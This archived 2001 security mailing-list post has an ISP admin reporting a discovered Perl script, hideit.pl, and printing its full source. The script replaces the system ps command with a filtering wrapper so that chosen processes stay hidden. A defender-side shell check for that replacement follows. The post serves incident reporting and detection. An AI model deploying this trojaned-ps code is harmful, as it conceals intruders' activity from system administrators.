Security Incidents mailing list archives
hideit.pl hides any program from ps?!
From: "Richard Collins" <braingain88 () hotmail com>
Date: Sun, 12 Aug 2001 18:08:12 +0000
Hi, I'm an admin of a small ISP. I found this program on all my workstations. It was called hideit.pl. It seems to hide any program from ps!
#This little perl script will replace the ps program with a fake ps that
#doesn't show the program u want to hide, the original ps replaced will be saved
#in /bin/ps.bak and can be restored by running:ps2.pl Restore
#stupid but usefull!;)
#by SLACKo from Dalnet
#!/usr/bin/perl
if ($#ARGV<0) {die "Usage : $0 Program (To hide a program from ps) or
$0 Restore (To restore ps)\n"};
$eshta = `whereis ps` =~ /^\S+:\s+(\S+)/;$new=$1;
restore() if ($ARGV[0] eq "Restore");
system("cp $new /bin/ps.bak") if (! -f '/bin/ps.bak');
open(HH,">$new") or die "$!\n";
$string = <<"EOF";
#!/usr/bin/perl
open(PS,"/bin/ps.bak \$ARGV[0]|") or die "$!\n";
while (<PS>) {
s/perl(.*)bin(.*)/ps \$ARGV[0]/g;
next if (/($ARGV[0]|ps.bak)/);
print;}
EOF
print HH "$string";close(HH,PS);
sub restore {system("cp /bin/ps.bak $new");exit;}
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
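A defender-side check for the kind of replacement the posted script describes, added here as an example (it is not part of the original post): it flags a system tool whose file starts with an interpreter line instead of ELF magic, and a leftover backup copy such as /bin/ps.bak. It assumes a Linux host where ps is normally a compiled ELF binary; the function names are hypothetical, and on a host that may be compromised the utilities it calls (head, od) should come from trusted media.

```shell
#!/bin/sh
# Added example: flag a system tool that has been swapped for a script wrapper.
# Assumption: on this host the tool (e.g. ps) is normally a compiled ELF binary.

# Print the first N bytes of a file as lowercase hex with no separators.
magic_hex() {
    head -c "$2" "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n'
}

# Classify a file by its leading bytes: elf, script, other, or missing.
classify_tool() {
    [ -f "$1" ] || { echo missing; return; }
    if [ "$(magic_hex "$1" 4)" = "7f454c46" ]; then
        echo elf        # 0x7f 'E' 'L' 'F'
    elif [ "$(magic_hex "$1" 2)" = "2321" ]; then
        echo script     # '#!' interpreter line
    else
        echo other
    fi
}

# audit_tool TOOL [BACKUP]: print findings; return 1 when the tool needs a look.
# BACKUP defaults to /bin/ps.bak, the path named in the script's own comments.
audit_tool() {
    tool=$1
    backup=${2:-/bin/ps.bak}
    suspect=0
    kind=$(classify_tool "$tool")
    if [ "$kind" != "elf" ]; then
        echo "SUSPECT: $tool is '$kind', expected an ELF binary"
        if [ "$kind" = "script" ]; then
            echo "  interpreter line: $(head -n 1 "$tool")"
        fi
        suspect=1
    fi
    if [ -e "$backup" ]; then
        echo "SUSPECT: backup copy $backup exists (type: $(classify_tool "$backup"))"
        suspect=1
    fi
    return "$suspect"
}

# With a path argument the audit runs; with none, only the functions are defined.
if [ "$#" -gt 0 ]; then
    audit_tool "$@" || echo "-> compare against the package database or known-good media"
fi
```

A clean result here does not clear the host: a replaced binary that is itself compiled passes the magic check, so package verification or a hash comparison against known-good media remains the stronger test.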
